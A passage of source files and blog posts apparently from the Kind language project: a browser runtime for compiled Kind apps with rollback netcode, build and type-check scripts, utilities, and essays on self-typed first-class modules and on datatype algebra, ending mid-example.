this.canvas = {}; // multiple canvas that holds rendered pixel-art apps
}
// Initializes everything
async componentDidMount() {
await this.init_app();
await this.init_input_events();
await this.init_renderer();
}
// Clear up intervals and event listeners
async componentWillUnmount() {
for (var key in this.intervals) {
clearInterval(this.intervals[key]);
}
for (var key in this.listeners) {
document.body.removeEventListener(key, this.listeners[key]);
};
}
// Loads the application from Moonad, which was pre-compiled to JavaScript
async init_app() {
if (!this.app && apps[this.name]) {
//console.log("loading app...");
this.app = (await apps[this.name])[this.name];
this.app_has_ticker = this.app.tick.toString() !== "x0 => x1 => App$no_tick$(x0, x1)"; // lil hacker's optimization
this.app_state = {
_: "App.Store.new",
local: this.app.init.local,
global: this.app.init.global
};
}
}
// Initializes the input event listeners
async init_input_events() {
//this.events = []; // this application's events
//function print_time() {
//console.clear();
//console.log("local_time : ", Date.now());
//console.log("server_time : ", window.KindEvents.get_time());
//console.log("delta_time : ", Date.now() - window.KindEvents.get_time());
//console.log("");
//}
//setInterval(print_time, 200);
// Init event
this.register_event({
_: "App.Event.init",
time: BigInt(0),
user: ethsig.addressFromKey("0x"+KEY).slice(2),
info: {
_: "App.EnvInfo.new",
screen_size: {
_: "Pair.new",
fst: this.container ? this.container.width : 0,
snd: this.container ? this.container.height : 0,
},
mouse_pos: this.mouse_pos,
}
});
// Mouse movement event
this.listeners.mousemove = (e) => {
this.mouse_pos = {_: "Pair.new", fst: e.pageX, snd: e.pageY};
this.register_event({
_: "App.Event.mouse_move",
time: BigInt(Date.now()),
id: e.target.id,
mouse_pos: {_: "Pair.new", fst: e.offsetX, snd: e.offsetY}
});
}
document.body.addEventListener("mousemove", this.listeners.mousemove);
// Mouse down event
this.listeners.mousedown = (e) => {
this.register_event({
_: "App.Event.mouse_down",
time: BigInt(Date.now()),
});
};
document.body.addEventListener("mousedown", this.listeners.mousedown);
this.listeners.mouseover = (e) => {
this.register_event({
_: "App.Event.mouse_over",
time: BigInt(Date.now()),
id: e.target.id
});
};
document.body.addEventListener("mouseover", this.listeners.mouseover);
this.listeners.click = (e) => {
this.register_event({
_: "App.Event.mouse_click",
time: BigInt(Date.now()),
id: e.target.id
});
};
document.body.addEventListener("click", this.listeners.click);
// Mouse up event
this.listeners.mouseup = (e) => {
this.register_event({
_: "App.Event.mouse_up",
time: BigInt(Date.now()),
});
};
document.body.addEventListener("mouseup", this.listeners.mouseup);
// Key down event
this.listeners.keydown = (e) => {
if (!e.repeat) {
this.register_event({
_: "App.Event.key_down",
time: BigInt(Date.now()),
code: e.keyCode,
});
}
};
document.body.addEventListener("keydown", this.listeners.keydown);
// Key up event
this.listeners.keyup = (e) => {
this.register_event({
_: "App.Event.key_up",
time: BigInt(Date.now()),
code: e.keyCode,
});
};
document.body.addEventListener("keyup", this.listeners.keyup);
// Tick event
this.intervals.tick = () => {
setInterval(() => {
this.register_tick(window.KindEvents.get_tick())
}, 1000 / 60);
};
this.intervals.tick()
// Frame event (60 fps)
this.intervals.frame = () => {
setInterval(() => {
this.register_event({
_: "App.Event.frame",
time: BigInt(Date.now()),
info: {
_: "App.EnvInfo.new",
screen_size: {
_: "Pair.new",
fst: screen.width,
snd: screen.height,
},
mouse_pos: this.mouse_pos,
}
})
}, 1000 / 60);
};
this.intervals.frame()
}
// Initializes the main render loop
async init_renderer() {
if (DEBUG_SHOW_FPS) {
var last_time = Date.now();
var fps_count = 0;
}
this.intervals.renderer = setInterval(() => {
if (this.app) {
if (DEBUG_SHOW_FPS) {
if (Date.now() - last_time > 1000) {
//console.log("FPS: ", fps_count);
fps_count = 0;
last_time = Date.now();
}
fps_count++;
}
this.rendered = this.app.draw(this.app_state);
this.forceUpdate();
}
}, 1000 / 32);
}
// Adds an event to the list of events
register_event(ev) {
if (this.app) {
this.run_io(this.app.when(ev)(this.app_state));
}
}
// Registers a post
register_post(post) {
if (this.app && this.watching[post.room]) {
var key = String(post.tick);
if (!this.app_global_posts[key]) {
this.app_global_posts[key] = [];
}
this.app_global_posts[key].push(post);
// console.log("New post at " + this.show_tick(post.tick));
if (!this.app_global_begin || post.tick < this.app_global_begin) {
this.app_global_begin = post.tick;
this.app_global_states = null;
this.app_global_tick = null;
}
this.register_tick(post.tick);
//console.log(this.app_global_posts);
//console.log(this.app_global_begin);
}
}
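  // Converts a tick index into a human-readable UTC timestamp (each tick spans 62.5 ms)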
show_tick(tick){
return (new Date(tick * 62.5)).toUTCString();
}
// Computes the global state at given tick (rollback netcode)
register_tick(tick) {
var restored = false;
if (this.app && this.app_global_begin !== null) {
// If the tick is older than the current state, rollback
if (this.app_global_tick !== null && tick < this.app_global_tick) {
//console.log("- older than " + this.app_global_tick);
var latest = StateList.latest(tick, this.app_global_states);
// If there is no previous state, reset to initial state
if (latest === null) {
this.app_global_tick = null;
this.app_state.global = this.app.init.global;
// Otherwise, restore found state
} else {
restored = true;
this.app_global_tick = latest.tick;
this.app_state.global = latest.state;
}
}
if (this.app_global_tick === null) {
//console.log("- init app_global_tick");
this.app_global_tick = this.app_global_begin;
}
var count_ticks = 0;
var count_posts = 0;
var begin_time = Date.now();
var total = tick - this.app_global_tick;
if (total > 16 && this.app_has_ticker) {
var from_date = new Date(this.app_global_tick * 62.5);
var to_date = new Date(tick * 62.5);
this.display = "Computing " + total + " ticks.\n";
this.display += "From : " + from_date.toUTCString().slice(5) + "\n";
this.display += "UpTo : " + to_date.toUTCString().slice(5) + "\n";
this.forceUpdate();
}
// amount of ticks done after one post
var tick_limit = 16 * 64;
if (restored) {
// posts between latest state and actual tick
var post_ticks = [];
// post before latest state
// used to redo ticks between latest and first restored post
var immediately_before = undefined;
for (let key in this.app_global_posts) {
let n_key = Number(key)
// finding which posts restore
if (n_key > this.app_global_tick) post_ticks.push(n_key);
else
// find post immediately before latest state
if (n_key > immediately_before || immediately_before === undefined)
immediately_before = n_key;
}
// order posts
post_ticks.sort();
// do ticks between latest state and first post restored
if (immediately_before) {
var compute_from_tick = this.app_global_tick;
var compute_to_tick = Math.min(this.app_global_tick
+ (tick_limit - (this.app_global_tick - immediately_before)), post_ticks[0]);
for (var t = compute_from_tick; t < compute_to_tick; ++t) {
this.execute(t);
}
}
// restore posts and their ticks between latest state and actual tick
for (var j = 0; j < post_ticks.length - 1 ; j++) {
var until = Math.min(post_ticks[j + 1] - post_ticks[j], tick_limit);
var compute_from_tick = post_ticks[j];
var compute_to_tick = compute_from_tick + until;
for (var t = compute_from_tick; t < compute_to_tick; ++t) {
this.execute(t);
}
}
} else {
var compute_from_tick = this.app_global_tick;
var compute_to_tick = Math.min(compute_from_tick + tick_limit, tick); // pauses after 16*64 ticks of no posts
for (var t = compute_from_tick; t < compute_to_tick; ++t) {
//++count_ticks;
this.execute(t);
};
}
this.display = null;
this.app_global_tick = tick;
//if (this.app_global_tick > (Date.now() - 1000) / 62.5) {
//console.log("At " + tick + "("+(compute_to_tick-compute_from_tick)+" computed)");
//}
}
}
// receives a timestamp and execute its posts and tick
execute(t) {
var posts = this.app_global_posts[String(t)];
var state = this.app_state.global;
if (posts) {
for (var i = 0; i < posts.length; ++i) {
var post = posts[i];
state = this.app.post(post.tick)(post.room)(post.addr)(post.data)(state);
}
}
if (this.app_has_ticker) {
state = this.app.tick(BigInt(t))(state);
}
this.app_global_states = StateList.push({tick: t+1, state}, this.app_global_states);
this.app_state.global = state;
}
// Resets the state and recomputes all posts
recompute_posts() {
this.app_global_states = null;
this.app_global_tick = null;
this.app_global_begin = null;
this.app_global_posts = {};
this.app_state.global = this.app.init.global;
for (var post of this.received_posts) {
//console.log("recompute post: " + JSON.stringify(post));
this.register_post(post);
}
}
// Performs an IO computation
run_io(io) {
//console.log("hmmm", io);
switch (io._) {
case "IO.end":
switch (io.value._) {
case "Maybe.none":
return Promise.resolve(null);
case "Maybe.some":
this.app_state.local = io.value.value;
return Promise.resolve(io.value.value);
}
break;
case "IO.ask":
// console.log("IO.ask", io);
return new Promise((res, err) => {
switch (io.query) {
case "print":
alert(io.param);
return this.run_io(io.then("")).then(res).catch(err);
case "put_string":
alert(io.param);
return this.run_io(io.then("")).then(res).catch(err);
case "get_time":
return this.run_io(io.then(String(Date.now()))).then(res).catch(err);
case "get_line":
var answer = prompt(io.param) || "";
return this.run_io(io.then(answer)).then(res).catch(err);
case "get_file":
var data = localStorage.getItem(io.param) || "";
return this.run_io(io.then(data)).then(res).catch(err);
case "set_file":
var path = '';
for (var i = 0; i < io.param.length && io.param[i] !== '='; ++i) {
path += io.param[i];
};
var data = io.param.slice(i + 1);
localStorage.setItem(path, data);
return this.run_io(io.then("")).then(res).catch(err);
case "del_file":
localStorage.removeItem(io.param);
return this.run_io(io.then("")).then(res).catch(err);
case "request":
return fetch(encodeURI(io.param))
.then(result => result.text())
.then(result => this.run_io(io.then(result)))
.then(res)
.catch(err => {
let msg = err.message;
let call_fix = ".\nLet us know ..."; // TODO: add call to Github issue
this.run_io(io.then("Oops, something went wrong: "+ msg + call_fix))
});
case "unwatch":
if (utils.is_valid_hex(64, io.param)) {
this.watching[io.param] = false;
window.KindEvents.unwatch_room(io.param);
this.recompute_posts();
} else {
// console.log("Error: invalid input on App.Action.unwatch");
}
return this.run_io(io.then("")).then(res).catch(err);
case "watch":
if (utils.is_valid_hex(64, io.param)) {
//console.log('watch', io.param);
this.watching[io.param] = true;
window.KindEvents.watch_room(io.param);
this.recompute_posts();
window.KindEvents.on_post(({ room, tick, addr, data }) => {
var tick = parseInt(tick, 16);
this.register_post({room,tick,addr,data});
this.received_posts.push({room,tick,addr,data});
//this.register_event({ _: "App.Event.post", time, room, addr : addr, data });
});
} else {
// console.log("Error: invalid input on App.Action.watch");
}
return this.run_io(io.then("")).then(res).catch(err);
case "post":
var [room, data] = io.param.split(";");
if (utils.is_valid_hex(64, room) && utils.is_valid_hex(null, data)) {
window.KindEvents.send_post(room, data);
} else {
// console.log("Error: invalid input on App.Action.post");
}
return this.run_io(io.then("")).then(res).catch(err);
}
});
}
}
// Renders a document
render_dom(elem) {
//console.log("render_dom", elem);
switch (elem._) {
// Renders a HTML element
case "DOM.node":
let props = utils.map_to_object(elem.props);
let style = utils.map_to_object(elem.style);
return h(elem.tag, {
...props,
style: style,
onInput: (event) => {
if (elem.tag === "input" || elem.tag === "textarea") {
let time = BigInt(Date.now());
this.register_event({_: "App.Event.input", time, id: props.id, text: event.target.value});
}
},
}, utils.list_to_array(elem.children).map(x => this.render_dom(x)));
// Renders a VoxBox using a canvas
case "DOM.vbox":
let canvas_props = utils.map_to_object(elem.props);
let canvas_style = utils.map_to_object(elem.style);
var id = canvas_props ? canvas_props.id || "" : "";
var width = Number(canvas_props.width) || 256;
var height = Number(canvas_props.height) || 256;
var scale = Number(canvas_props.scale) || 1;
var canvas = this.get_canvas(id, width, height, scale);
var length = elem.value.length;
var capacity = elem.value.capacity;
var buffer = elem.value.buffer;
// Renders pixels to buffers
for (var i = 0; i < length; ++i) {
var pos = buffer[i * 2 + 0];
var col = buffer[i * 2 + 1];
var p_x = (pos >>> 0) & 0xFFF;
var p_y = (pos >>> 12) & 0xFFF;
var p_z = (pos >>> 24) & 0xFF;
var idx = p_y * canvas.width + p_x;
var dep = canvas.depth_u8[idx];
if (p_x >= 0 && p_x < width && p_y >= 0 && p_y < height && p_z >= dep) {
canvas.image_u32[idx] = col;
canvas.depth_u8[idx] = p_z;
canvas.clear.data[canvas.clear.length++] = idx;
}
}
// Renders buffers to canvas
canvas.image_data.data.set(canvas.image_u8);
canvas.context.putImageData(canvas.image_data, 0, 0);
// Erases pixels from buffers
for (var i = 0; i < canvas.clear.length; ++i) {
var idx = canvas.clear.data[i];
canvas.image_u32[idx] = 0;
canvas.depth_u8[idx] = 0;
}
canvas.clear.length = 0;
// Mutably resets the length of the VoxBox
elem.value.length = 0;
return h("div", {
ref: function (x) { if (x) { x.appendChild(canvas) } }
});
// Renders plain text
case "DOM.text":
return elem.value;
}
}
// Component's render function
render() {
if (!this.app) {
return "Loading app...";
} else if (!this.rendered) {
return "Rendering app...";
} else if (this.display) {
return h("pre",
{
id: "container",
style: {
"width": "100%",
"height": "100%",
"display": "flex",
"justify-content": "center",
"align-items": "center",
},
},
[this.display]);
} else {
return h("div",
{
id: "container",
style: {
"width": "100%",
"height": "100%",
},
},
this.render_dom(this.rendered));
}
}
// remove canvas element
// used to avoid creation of infinite canvas
remove_canvas(id) {
let element =
id ?
document.getElementById(id) :
document.querySelector("canvas")
if (element) element.remove();
}
// Gets a pixel-art canvas
get_canvas(id, width, height, scale=1) {
if (!this.canvas[id] || this.canvas[id].width !== width || this.canvas[id].height !== height) {
// console.log("creating canvas", id, width, height);
this.remove_canvas(id);
this.canvas[id] = document.createElement("canvas");
this.canvas[id].id = id;
this.canvas[id].classList.add("pixel-art");
this.canvas[id].width = width;
this.canvas[id].height = height;
this.canvas[id].style.width = (width*scale) + "px";
this.canvas[id].style.height = (height*scale) + "px";
this.canvas[id].clear = { length: 0, data: new Uint32Array(width * height * 32) };
//this.canvas[id].style.border = "1px solid black";
this.canvas[id].context = this.canvas[id].getContext("2d");
this.canvas[id].image_data = this.canvas[id].context.getImageData(0, 0, this.canvas[id].width, this.canvas[id].height)
this.canvas[id].image_buf = new ArrayBuffer(this.canvas[id].image_data.data.length);
this.canvas[id].image_u8 = new Uint8ClampedArray(this.canvas[id].image_buf);
this.canvas[id].image_u32 = new Uint32Array(this.canvas[id].image_buf);
this.canvas[id].depth_buf = new ArrayBuffer(this.canvas[id].image_u32.length);
this.canvas[id].depth_u8 = new Uint8Array(this.canvas[id].depth_buf);
}
return this.canvas[id];
}
}
<file_sep>/web/events/example.js
var client = require("./client.js");
var api = client({
//url: "ws://uwu.tech:7171",
url: "ws://localhost:7171",
key: "0000000000000000000000000000000000000000000000000000000000000001",
});
// When connected, watches room 0 and makes an example post.
api.on_init(() => {
var room = "1234000000004321";
var post = "01020304";
// Watches the room
api.watch_room(room);
// Posts a 256-bit message to it
//api.send_post(room, post);
function print_time() {
//console.clear();
console.log("local_time : ", Date.now());
console.log("server_time : ", api.get_time());
console.log("delta_time : ", Date.now() - api.get_time());
console.log("");
}
print_time()
setInterval(print_time, 1000);
});
// When there is a new posts, print all posts we have recorded.
api.on_post((post, Posts) => {
//console.clear();
console.log(JSON.stringify(post));
//console.log(JSON.stringify(Posts, null, 2));
});
<file_sep>/web/build.js
// Compiles apps from `Kind/base/App/*.kind to `src/apps/*.js`
var fs = require("fs");
var {exec, execSync} = require("child_process");
require('dotenv/config');
var code_dir = __dirname+"/src";
var kind_dir = __dirname+"/../base";
// TODO: remove from "src/apps" the ones that are no longer in "base/Apps"
process.chdir(kind_dir);
var all_kind_apps = fs.readdirSync("App").filter(x => x.slice(-5) === ".kind");
var all_js_apps = [];
// console.log(all_kind_apps)
// App that will be displayed when accessing http://uwu.tech
var server_apps = [
'Browser.kind',
'Hello.kind',
'Kind.kind',
'KL.kind',
'Playground.kind',
'Pong.kind',
'Seta.kind',
'TicTacToe.kind'
]
var app = "";
var compiled_apps = [];
console.log("[1/2] Compiling apps:")
const build_server = process.env.PRODUCTION;
if (process.argv[2]) { // Only build 1 App
app = all_kind_apps.filter(name => {
const match = process.argv[2].toLowerCase()
return name.toLowerCase().endsWith(match)
|| name.toLowerCase().endsWith(match+".kind");
})[0];
if (app) {
compiled_apps = compile_app(app);
} else {
console.log("[error] App "+process.argv[2]+" not found.");
}
} else { // Build all Apps
console.log("Tip: to build only 1 app, use \x1b[2mnode build.js app_name\x1b[0m.")
const apps = build_server ? server_apps : all_kind_apps;
for (var file of apps) {
compiled_apps.push(compile_app(file));
}
}
// Compile app from ".kind" to ".js"
// Save it in "src/apps/"
function compile_app(name) {
all_js_apps.push("App."+name.replace(".kind",".js"));
process.chdir(kind_dir);
var name = "App."+name.slice(0,-5);
console.log("- " + name);
try {
var code = String(execSync("kind "+name+" --js --module | js-beautify", {maxBuffer: 1024 * 1024 * 1024}));
} catch (e) {
console.log("Couldn't compile " + file + ". Error:");
console.log(e.toString());
}
// Write compiled App file
process.chdir(code_dir);
fs.writeFileSync("apps/"+name+".js", code);
return name;
}
// Write "src/app/index.js" to export the Apps
process.chdir(code_dir);
var index = "module.exports = {\n";
const add_line = (app) => " '" + app.slice(0, -3) + "': import('./"+app+"'),\n";
if (app !== "" && app !== undefined) { // Check if need to add App to the export list
const app_export_format = "App."+app.slice(0,-5)+".js";
if (!all_js_apps.includes(app_export_format)) all_js_apps.push(app_export_format);
}
const formatted_server_app = (app) => app.slice(4).slice(0, -3) + ".kind";
// Define which Apps will be on index.js file
const apps_in_index =
build_server
? all_js_apps.filter((app) => server_apps.includes(formatted_server_app(app)))
: all_js_apps;
// Order Apps alphabetically
apps_in_index.sort((a, b) => a.localeCompare(b))
for (var app of apps_in_index ) {
index += add_line(app);
}
index += "}\n";
fs.writeFileSync("apps/index.js", index);
console.log("\n[2/2] Building index.js...");
exec("npm run build", function (err, stdout, stdin) {
if (err) {
console.log(err);
} else {
console.log("Done.");
}
})
<file_sep>/web/src/utils.js
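// Checks that `hex` is a hexadecimal string; when `bits` is given, the string
// must encode exactly that many bits (i.e. bits/4 hex digits).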
function is_valid_hex(bits, hex) {
if (bits) {
return new RegExp("^[0-9A-Fa-f]{"+Math.floor(bits/4)+"}$").test(hex)
} else {
return new RegExp("^[0-9A-Fa-f]*$").test(hex)
}
}
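// Converts a Kind List (a chain of List.cons nodes) into a JS array, stopping
// at the first non-cons node (the nil).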
function list_to_array(list) {
var arr = [];
while (list._ === "List.cons") {
arr.push(list.head);
list = list.tail;
}
return arr;
}
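// Flattens a Kind BBT map (BBT.bin / BBT.tip nodes) into a plain JS object of
// key -> val entries.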
function map_to_object(map, obj = {}) {
switch (map._) {
case "BBT.bin":
obj[map.key] = map.val;
map_to_object(map.left, obj);
map_to_object(map.right, obj);
break;
case "BBT.tip":
break;
}
return obj;
}
// function bits_to_string(bits) {
// var str = "";
// for (var i = 0; i < bits.length; i += 16) {
// var binary = bits.slice(i, i + 16).split("").reverse().join("");
// str += String.fromCharCode(parseInt(binary, 2));
// }
// return str;
// }
module.exports = {
is_valid_hex,
list_to_array,
map_to_object,
// bits_to_string,
}
<file_sep>/blog/2-first-class-modules-with-self-types.md
First class modules with self types
===================================
Sometimes, heterogeneous data types are desirable, even in a strongly typed
language. For example, first-class modules could be represented as maps from
strings to functions. The problem is, the type of these functions may vary:
```
IntLib.add(a: Int, b: Int): Int
a + b
IntLib.neg(a: Int): Int
0 - a
IntLib: Module
{
"add": Dynamic.new!(IntLib.add) // Int -> Int -> Int
"neg": Dynamic.new!(IntLib.neg) // Int -> Int
}
five: Int
Module.value_of(IntLib, "add")(+2, +3)
```
So how can we represent the `Module` type? Neither `Map<Int -> Int -> Int>` nor
`Map<Int -> Int>` would work, since `add` and `neg` have different types.
Creating a sum type with every possible type of function wouldn't be viable,
either. There is no escape: sometimes we just need a way to talk about dynamic
values, even though we're in a statically typed language.
## The Dynamic type in Agda
In a dependently typed language, one way to have this is to implement a
`Dynamic` type, which is a pair of `type, value`:
```
data Dynamic : Set where
new : (T : Set) -> (value : T) -> Dynamic
```
This datatype is like a box that "hides" a value and its type internally, but is
itself viewed as a single type, called `Dynamic`. This, in turn, allows us to
create collections of types that vary. For example, we may store ints and
strings in the same `List Dynamic`:
```
elems : List Dynamic
elems = [new Int 3, new String "foo"]
```
We can also make functions to extract the type and the value of a `Dynamic`:
```
typeOf : Dynamic -> Set
typeOf (new T value) = T
valueOf : (dyn : Dynamic) -> typeOf dyn
valueOf (new T value) = value
```
And we can use `valueOf` to recover a typed value from a "static dynamic":
```
dyn : Dynamic
dyn = new Int 7
num : Int
num = valueOf dyn
```
Of course, we can only turn a `Dynamic` into a well-typed value if it has a
statically known type. Otherwise, it becomes useless, since we won't be able to
do anything with it (after all, `Int` functions work on `Int` arguments, not `Dynamic`
arguments, for example). But for first-class modules, `Dynamic` is very handy,
since we're always able to cast module functions to their actual types.
## The Dynamic type in Kind, with Self types
If we blindly translate the program above to Kind, this is what we get:
```
type Dynamic {
new<T: Type>(value: T)
}
Dynamic.type_of(dyn: Dynamic): Type
case dyn {
new: dyn.T
}
Dynamic.value_of(dyn: Dynamic): Dynamic.type_of(dyn)
case dyn {
new: dyn.value
}
dyn: Dynamic
Dynamic.new<Nat>(7)
num: Nat
case dyn {
new: dyn.value
}
```
Unlike Agda (which does a lot under the hood), Kind is a more bare-bones language
that desugars the syntax above to a very simple core calculus. Because of that,
this program, as is, doesn't type check, since Kind isn't able to tell that the
`T` field of `dyn` is equal to `Nat`, even though that's the case, since `dyn`
is a static value. To solve this, we must get our hands dirty and hack the self
types directly. First, we use `kind <term> --show` to recover the Self encoding
for the `Dynamic` type, and its constructor:
```
$ kind Dynamic --show
Dynamic.Self<P:(:Dynamic) Type> (new:<T:Type> (value:T) P(Dynamic.new(T,value))) P(Dynamic.Self)
$ kind Dynamic.new --show
(T) (value) (P) (new) new(T,value)
```
Then, we replace the `type Dynamic { ... }` syntax sugar by the terms above:
```
Dynamic: Type
self<P: Dynamic -> Type>
(new: <T: Type> (value: T) P(Dynamic.new(T, value)))
P(self)
Dynamic.new<T: Type>(value: T): Dynamic
(P, new) new(T,value)
```
I must stress that this program is identical to the previous one; we've just
written the Self encoding directly instead of letting the `type Dynamic { ... }`
syntax desugar to it. Now, we hack it by making one small change: we replace
`value : T` in the `new` constructor by `value : type_of(self)`. That's because
`T` is the first field of `self`, so both are equivalent:
```
Dynamic: Type
self<P: Dynamic -> Type>
(new: <T: Type> (value: Dynamic.type_of(self)) P(Dynamic.new(Dynamic.type_of(self), value)))
P(self)
Dynamic.new<T: Type>(value: T): Dynamic
(P, new) new(T,value)
```
This should work in any language with self types. Since not every reader is
familiar with Kind's syntax, here is the same code in an Agda-like syntax:
```
Dynamic : Set
Dynamic =
∀ self (P : Dynamic -> Set) ->
∀ (new : (T : Type) -> (value : typeOf self) -> P (new (typeOf self) value)) ->
P self
new : (T : Set) -> (value : T) -> Dynamic
new T value = \ P new -> new T value
```
With this small change, we're now able to extract values of static dynamics just
like in Agda. In other words, the following program type-checks just fine:
```
dyn: Dynamic
Dynamic.new<Nat>(7)
num: Nat
case dyn {
new: dyn.value
}
```
With this, we're able to represent first-class modules in Kind. The `Dynamic`
and `Module` modules are already on base. Kind users can already use first-class
modules in their code, and the first snippet in this post works as is!
As a last thought, I wonder if, in the future, we should desugar the `type`
syntax in a way that does this automatically. I see no reason not to, but
it would increase the complexity of the desugarer considerably.
<file_sep>/web/type_check_Apps.js
var fs = require("fs");
var { execSync } = require("child_process");
var kind_dir = __dirname+"/../base";
process.chdir(kind_dir);
var all_kind_apps = fs.readdirSync("App").filter(x => x.slice(-5) === ".kind");
const args = process.argv[2];
if (args) {
let app = args.slice(5); // remove "base/"
if (process.argv[2].trim() === "all") { // node type_check_Apps all
exit_all(type_check_apps());
} else { // node type_check_Apps App/[name]
if (app) {
is_folder(app)
? exit(type_check_folder(get_app_folder(app)))
: exit(type_check_app(app));
} else {
console.log("Invalid parameter");
exit(false);
}
}
} else {
console.log("A parameter must be specified.");
console.log("- node type_check_Apps App.[name]");
console.log("- node type_check_Apps all");
}
function is_folder(path) {
let folders = path.split("/");
console.log(folders)
return (folders.length > 1) && (!folders[1].endsWith(".kind"));
}
function get_app_folder(path) {
return path.split("/")[1];
}
function exit(success) {
if (success) {
console.log("\x1b[32msuccess\x1b[39m\n")
process.exit();
} else {
console.error("\x1b[31mfail\x1b[39m\n");
process.exit(1);
}
}
// Exit from type checking all Apps' folder
// Show the ones with error
function exit_all(res) {
if (res["fail"].lenght === 0) {
console.log("\x1b[32msuccess\x1b[39m\n")
process.exit();
} else {
console.log("Found error in folders: ", res["fail"]);
console.error("\x1b[31mfail\x1b[39m\n");
process.exit(1);
}
}
// Type check an App in base/App
// ex: node type_check_Apps App/Playground.kind
function type_check_app(name) {
console.log("Type checking "+name+"...")
const type_check = execSync('kind '+ name, function (error, stdout, stderr) {
if (error) {
console.log(error.stack);
return false;
}
console.log('type check STDOUT: '+stdout);
});
let match = String(type_check).slice(-17, -1); // message at the end of the type check process
return match.endsWith("All terms check.");
}
// Type check an App's folder in base/App
// all_apps: when false, uses JavaScript compilation target. If true, Scheme.
// ex: node type_check_Apps App/Playground/
function type_check_folder(name, all_apps = false) {
if (fs.existsSync(kind_dir+"/App/"+name)) {
try {
console.log("Type checking folder App/"+name+"/* ...");
var target = all_apps ? "kind-scm" : "kind";
const type_check = execSync(target+' App/'+ name +"/", function (error, stdout, stderr) {
if (error) {
console.log(error.stack);
return false;
}
console.log('type check STDOUT: '+stdout);
});
let match = String(type_check).slice(-17, -1); // message at the end of the type check process
return match.endsWith("All terms check.");
} catch (e) {
console.log(e);
return false;
}
} else {
if (all_kind_apps.includes(name+".kind")) {
return true; // it's an App without folder
} else {
console.log("Couldn't find folder App/"+name);
return false;
}
}
}
// Type check all apps
// IMPORTANT: it will not work if the compilation target isn't Scheme.
function type_check_apps() {
const success = [];
const fail = [];
for (var file of all_kind_apps) {
var app = file.slice(0, -5);
type_check_app("App."+app) ? success.push(file) : fail.push(file);
type_check_folder(app, true) ? success.push(app) : fail.push(app);
}
return {success, fail}
}
module.exports = { type_check_folder, is_folder };
<file_sep>/blog/4-funcional-alquimista.md
The Functional Alchemist
========================
Haskell and other functional languages use algebraic datatypes, declared with the `data` syntax:
```
data Bool = True | False
data Jokenpo = Rock | Paper | Scissor
data Pair x = MakePair x x
data Maybe x = Nothing | Just x
data Nat = Zero | Succ Nat
data List x = Nil | Cons x (List x)
data Tree x = Empty | Branch x (List (Tree x))
```
If you don't understand what is going on above, the rest won't make sense (and that's okay); in that case, I recommend reading a Haskell tutorial if you're still interested in this post. If the lines above do make sense to you, keep reading, because I'm going to tell you the story of a functional alchemist who went too far.
It was a beautiful sunny afternoon when a functional alchemist, like any other, asked himself the question we all ask one day: "if functional types are called algebraic... why don't we write them as algebraic equations?" Not knowing that this question would lead him down a path of no return, one that would brush against the gate of truth, the poor alchemist picked up a piece of chalk and, on his already worn-out blackboard, wrote the following equation:
```
Bool = 1 + 1
```
In his head, this made sense, because Bool is a sum type, which can have two values: True and False. On the line below, he wrote:
```
Jokenpo = 1 + 1 + 1
```
That also made sense, because there are 3 moves in Jokenpo (rock-paper-scissors): Rock, Paper, Scissor. Up to that point, it all looked like an innocent game. But it was on the next line that things started to get... interesting. If sum types are represented by addition, then product types can only be represented by...
```
Pair x = x * x
```
A multiplication! But does that really work? Let's check: according to this equation, the type `Pair Jokenpo` should have a total of `(1 + 1 + 1) * (1 + 1 + 1) = 3 * 3 = 9` elements. Let's count:
```
(Rock, Rock)
(Rock, Paper)
(Rock, Scissor)
(Paper, Rock)
(Paper, Paper)
(Paper, Scissor)
(Scissor, Rock)
(Scissor, Paper)
(Scissor, Scissor)
```
NANI!? It can't be. Or can it? On the line below, he wrote:
```
Maybe x = 1 + x
```
According to this equation, the type `Maybe Bool` should have `1 + 2 = 3` elements. Let's count:
```
Nothing
Just True
Just False
```
Whoa. But what happens with infinite types?
```
Nat = 1 + Nat
```
In this case, we get a loop:
```
Nat = 1 + 1 + Nat
Nat = 1 + 1 + 1 + Nat
Nat = 1 + 1 + 1 + 1 + ... Nat
```
Which reflects the fact that there are infinitely many natural numbers. Soon enough, he found that the same holds for lists and trees:
```
List x = 1 + x * List x
```
To visualize this equation, let's first count the number of elements of the type `List Bool`, for each list length:
`List Bool` of length 0 has 1 element:
```
[]
```
`List Bool` of length 1 has 2 elements:
```
[True]
[False]
```
`List Bool` of length 2 has 4 elements:
```
[True,True]
[True,False]
[False,True]
[False,False]
```
`List Bool` of length 3 has 8 elements:
```
[True,True,True]
[True,True,False]
[True,False,True]
[True,False,False]
[False,True,True]
[False,True,False]
[False,False,True]
[False,False,False]
```
That is, in total, `List Bool` has:
```
1 + 2 + 4 + 8 + 16 + ...
```
elements. Does that agree with the equation above? Let's try applying it:
```
List Bool = 1 + 2 * List Bool
List Bool = 1 + 2 * (1 + 2 * List Bool)
List Bool = 1 + 2 + 4 * List Bool
List Bool = 1 + 2 + 4 * (1 + 2 * List Bool)
List Bool = 1 + 2 + 4 + 8 * List Bool
List Bool = 1 + 2 + 4 + 8 * (1 + 2 * List Bool)
List Bool = 1 + 2 + 4 + 8 + 16 * List Bool
List Bool = ...
```
Wow! At that moment, the alchemist knew he had found something truly interesting. He was at the edge of the gate of truth, but there was still time to go back: turn around, pretend that little game had never happened, and live a normal, quiet life. But the alchemist thirsted for truth and did not fear the inquisition. So, with blood in his eyes and trembling hands, he wrote one more line. This line, I transcribe for you in its original form:
```
d/dx Pair x = ?
```
At that moment, the door of truth opened.
```
d/dx Pair x =
d/dx (x * x) =
d/dx (x²) =
2x
```
This line told him that the derivative of the pair type, represented by "x * x", is the type represented by "x + x", that is:
```
data DeltaPair x = Fst x | Snd x
```
But what would be the relationship between this type and the pair type? The alchemist, perplexed, thought for a long time, until he formulated the following theory: if the derivative of an algebraic function is a function capable of focusing on an infinitesimal point of the original function, then the derivative of an algebraic type should be a type capable of focusing on one point of the original type. That made sense. After all, if we have the pair `(5, 7)`, we can focus on two elements: the left one, `(*, 7)`, or the right one, `(5, *)`. These two focus points can be represented by the DeltaPair type as `Fst 7` or `Snd 5`, respectively; a small sketch of this reading follows below.
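Here is a minimal sketch of that intuition, assuming Haskell; the `plug` helper is my own name and is not part of the original derivation. A `DeltaPair x` is a pair with a hole, and plugging a value back into the hole rebuilds the pair.
```
-- Minimal sketch (the `plug` helper is mine): DeltaPair x as a pair with a hole.
data Pair x = Pair x x deriving Show

data DeltaPair x = Fst x | Snd x deriving Show -- x + x, i.e. 2x

-- Plugging a value into the hole reconstructs the original pair.
plug :: x -> DeltaPair x -> Pair x
plug v (Fst right) = Pair v right -- the hole was on the left:  (*, right)
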